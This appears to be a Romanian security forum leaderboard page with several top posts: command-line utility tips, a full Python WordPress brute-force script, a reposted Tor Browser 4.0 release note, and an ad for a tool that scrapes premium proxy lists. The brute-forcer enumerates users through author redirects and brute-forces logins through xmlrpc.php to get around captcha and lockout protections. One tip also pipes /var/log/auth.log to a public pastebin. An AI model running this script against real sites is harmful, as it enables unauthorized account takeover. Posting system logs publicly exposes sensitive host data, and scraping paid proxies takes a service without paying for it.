Leaderboard
Popular Content
Showing content with the highest reputation on 10/17/14 in all areas
-
Recent am fost nevoit sa lucrez cu un fisiere de tip text de mari dimensiuni situate pe statii la distanta. Un utilitar care permite copierea facila a fisierelor este pastebinit. Se instaleaza folosind: sudo apt-get install pastebinit Pentru a-l folosi rulam: cat /cale/catre/fisier | pastebinit De exemplu: sudo cat /var/log/auth.log | pastebinit In urma executiei va aparea un URL catre continutul fisierului. Un alt utilitar este youtube downloader(youtube-dl). Acesta se instaleaza ruland: sudo apt-get install youtube-dl Pentru a descarca un filmulet rulam: youtube-dl <URL_youtube> Putem seta si calitatea la care dorim sa salvam video-ul: youtube-dl -f <numar_format> <URL_youtube> Pentru a vedea tipurile de format disponibile rulam: youtube-dl --help1 point
-
import urllib2 import Queue import threading,sys useri=[] passwd=[] url="" work=0 stiva=Queue.Queue() stiva_us=Queue.Queue() def login(domain,user,passs): xml_post="<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>"+str(user)+"</string></value></param><param><value><string>"+str(passs)+"</string></value></param></params></methodCall>" re=urllib2.Request(domain,xml_post) try: ur=urllib2.urlopen(re) html=ur.read() if "Incorrect username" in html: return 0 elif "isAdmin" in html: return 1 elif "requested method " in html: print "[+] Modulul wp.getUsersBlogs e blocat!" exit() else: print "[!] unknow response" exit() except urllib2.URLError,e: print "[!] Erroare HTTP "+e.code() exit() def enum(j): global work,stiva,url,useri while work==1: try: i=stiva.get(False) try: r=urllib2.Request(url+"?author="+str(i)) u=urllib2.urlopen(r) redirect=u.geturl() if "/author/" in redirect: splited=redirect.split("/author/") us=splited[1].replace("/","") if us not in useri: useri.append(us) print us except urllib2.URLError,e: a=1 if stiva.empty(): return 0 except Queue.Empty: pass else: stiva.task_done() def brute(j): global bad,stiva_us,url,work while work==1: try: creds=stiva_us.get(False) rez=login(url,creds[0],creds[1]) print str(creds[0])+" "+str(creds[1]) if rez==1: print "[+] Got him ^~^ :"+str(creds[0])+" "+str(creds[1]) work=0 except Queue.Empty: pass else: stiva_us.task_done() url=sys.argv[1] passwd=open(sys.argv[3]).read().splitlines() th=[] th_br=[] work=1 for i in range(4): t=threading.Thread(target=enum,args=(1,)) th.append(t) t.start() for i in range(12): stiva.put(i) for i in th: i.join() if len(useri)>0: print "[+] Am terminat de enumerat useri:"+str(len(useri)) print "[+] Incep bruteforce" else: print "[-] Nu s-au gasit useri voi incerca cu lista de useri" users=open(sys.argv[2]).read().splitlines() for user in users: useri.append(user) print "[+] Incep bruteforce" print "[+] Testez daca exista xmlrpc.php" r=urllib2.Request(url+"/xmlrpc.php") try: ur=urllib2.urlopen(r) except urllib2.URLError,e: print "[!] "+e.code()+" xmlrpc nu exista!" exit() work=1 url+="/xmlrpc.php" for us in useri: for p in passwd: stiva_us.put((us,p)) for t in range(int(sys.argv[4])): thr=threading.Thread(target=brute,args=(1,)) th_br.append(thr) thr.start() for t_j in th_br: t_j.join() print "[+] EXIT!" import urllib2 import Queue import threading,sys useri=[] passwd=[] url=" - Pastebin.com Aveam nevoie de un bruteforcer pt wordpress care sa treaca de protectii precum capcha sau restrictie prin incercari repetate,mi-am amintit de un articol unde prezenta acest concent si m-am apucat sa fac un bruteforcer in python (nu sunt foarte talentat la python m-am apucat doar de 3 luni).Mai intai v-a incerca sa enumere useri ( aici mai trebuie lucrat nu scoate din titlu ci doar din redirect) , iar apoi v-a face bruteforce. python wp_brute.py site.com userlist.txt passlist.txt NR_THREADS Userlist.txt este necesar atunci cand nu a reusit sa enumere useri. Eu l-am incercat pe 2 site-uri la care am stiut deja parola si pe localhost si a mers.1 point
-
pdate (Oct 16 20:35 UTC): The meek transport still needs performance tuning before it matches other more conventional transports. Ticket numbers are now listed in the post. The first release of the 4.0 series is available from the Tor Browser Project page and also from our distribution directory. This release features important security updates to Firefox. Additionally, due to the POODLE attack, we have also disabled SSLv3 in this release. The primary user-facing change since the 3.6 series is the transition to Firefox 31-ESR. More importantly for censored users who were using 3.6, the 4.0 series also features the addition of three versions of the meek pluggable transport. In fact, we believe that both meek-amazon and meek-azure will work in China today, without the need to obtain bridge addresses. Note though that we still need to improve meek's performance to match other transports, though. so adjust your expectations accordingly. See tickets #12428, #12778, and #12857 for details. This release also features an in-browser updater, and a completely reorganized bundle directory structure to make this updater possible. This means that simply extracting a 4.0 Tor Browser over a 3.6.6 Tor Browser will not work. Please also be aware that the security of the updater depends on the specific CA that issued the www.torproject.org HTTPS certificate (Digicert), and so it still must be activated manually through the Help ("?") "about browser" menu option. Very soon, we will support both strong HTTPS site-specific certificate pinning (ticket #11955) and update package signatures (ticket #13379). Until then, we do not recommend using this updater if you need stronger security and normally verify GPG signatures. There are also a couple behavioral changes relating to NoScript since 3.6. In particular, by default it now enforces script enable/disable for all sub-elements of a page, so you only need to enable scripts once for a page to work, rather than enabling many sub-scripts. This will hopefully make it possible for more people to use the "High Security" setting in our upcoming Security Slider, which will have Javascript disabled globally via NoScript by default. While we do not recommend per-element whitelisting due to fingerprinting, users who insist on keeping this functionality may wish to check out RequestPolicy. Note to MacOS users: We intend to deprecate 32bit OSX bundles very soon. If you are still using 32bit OSX 10.6, you soon will need to either update your OS to a later version, or begin using the Tails live operating system. Here is the changelog since 4.0-alpha-3: All Platforms Update Firefox to 31.2.0esr Update Torbutton to 1.7.0.1 Bug 13378: Prevent addon reordering in toolbars on first-run. Bug 10751: Adapt Torbutton to ESR31's Australis UI. Bug 13138: ESR31-about:tor shows "Tor is not working" Bug 12947: Adapt session storage blocker to ESR 31. Bug 10716: Take care of drag/drop events in ESR 31. Bug 13366: Fix cert exemption dialog when disk storage is enabled. [*]Update Tor Launcher to 0.2.7.0.1 Translation updates only [*]Udate fteproxy to 0.2.19 [*]Update NoScript to 2.6.9.1 [*]Bug 13027: Spoof window.navigator useragent values in JS WebWorker threads [*]Bug 13016: Hide CSS -moz-osx-font-smoothing values. [*]Bug 13356: Meek and other symlinks missing after complete update. [*]Bug 13025: Spoof screen orientation to landscape-primary. [*]Bug 13346: Disable Firefox "slow to start" warnings and recordkeeping. [*]Bug 13318: Minimize number of buttons on the browser toolbar. [*]Bug 10715: Enable WebGL on Windows (still click-to-play via NoScript) [*]Bug 13023: Disable the gamepad API. [*]Bug 13021: Prompt before allowing Canvas isPointIn*() calls. [*]Bug 12460: Several cross-compilation and gitian fixes (see child tickets) [*]Bug 13186: Disable DOM Performance timers [*]Bug 13028: Defense-in-depth checks for OCSP/Cert validation proxy usage [*]Bug 13416: Defend against new SSLv3 attack (poodle). Here is the list of all changes in the 4.0 series since 3.6.6: All Platforms Update Firefox to 31.2.0esr Udate fteproxy to 0.2.19 Update Tor to 0.2.5.8-rc (from 0.2.4.24) Update NoScript to 2.6.9.1 Update Torbutton to 1.7.0.1 (from 1.6.12.3) Bug 13378: Prevent addon reordering in toolbars on first-run. Bug 10751: Adapt Torbutton to ESR31's Australis UI. Bug 13138: ESR31-about:tor shows "Tor is not working" Bug 12947: Adapt session storage blocker to ESR 31. Bug 10716: Take care of drag/drop events in ESR 31. Bug 13366: Fix cert exemption dialog when disk storage is enabled. [*]Update Tor Launcher to 0.2.7.0.1 (from 0.2.5.6) Bug 11405: Remove firewall prompt from wizard. Bug 12895: Mention @Riseup.net as a valid bridge request email address Bug 12444: Provide feedback when “Copy Tor Log” is clicked. Bug 11199: Improve error messages if Tor exits unexpectedly Bug 12451: Add option to hide TBB's logo Bug 11193: Change "Tor Browser Bundle" to "Tor Browser" Bug 11471: Ensure text fits the initial configuration dialog Bug 9516: Send Tor Launcher log messages to Browser Console [*]Bug 13027: Spoof window.navigator useragent values in JS WebWorker threads [*]Bug 13016: Hide CSS -moz-osx-font-smoothing values. [*]Bug 13356: Meek and other symlinks missing after complete update. [*]Bug 13025: Spoof screen orientation to landscape-primary. [*]Bug 13346: Disable Firefox "slow to start" warnings and recordkeeping. [*]Bug 13318: Minimize number of buttons on the browser toolbar. [*]Bug 10715: Enable WebGL on Windows (still click-to-play via NoScript) [*]Bug 13023: Disable the gamepad API. [*]Bug 13021: Prompt before allowing Canvas isPointIn*() calls. [*]Bug 12460: Several cross-compilation and gitian fixes (see child tickets) [*]Bug 13186: Disable DOM Performance timers [*]Bug 13028: Defense-in-depth checks for OCSP/Cert validation proxy usage [*]Bug 4234: Automatic Update support (off by default) [*]Bug 11641: Reorganize bundle directory structure to mimic Firefox [*]Bug 10819: Create a preference to enable/disable third party isolation [*]Bug 13416: Defend against new SSLv3 attack (poodle). [*]Windows: Bug 10065: Enable DEP, ASLR, and SSP hardening options [*]Linux: Bug 13031: Add full RELRO hardening protection. Bug 10178: Make it easier to set an alternate Tor control port and password Bug 11102: Set Window Class to "Tor Browser" to aid in Desktop navigation Bug 12249: Don't create PT debug files anymore The list of frequently encountered known issues is also available in our bug tracker. Sursa: https://blog.torproject.org/blog/tor-browser-40-released?linkId=100667461 point
-
Hidemyass Daily Premium Proxy List V3.00 New |--> Screenshots <--| |--> Description <--| It list the latest hidemyass premium proxies Catcher (Not the free proxies) The listed proxies Loaded at the begin are the full list Very Fast request to get any list you want You can copy the list to the clip board The format of the lists : Plain text This is a Free, simple and very fast tool Updated Daily what'is new in this Version 3.0.0 Fixed some Bugs Add Uninstall Option From the Program and desktop Group Add New Custom Icône and setup wizard Add Filter by Country (you have all the lists in txt Format) Add More Download Links to void Dead Links ----- I'am not the Coder of this Tool--------1 points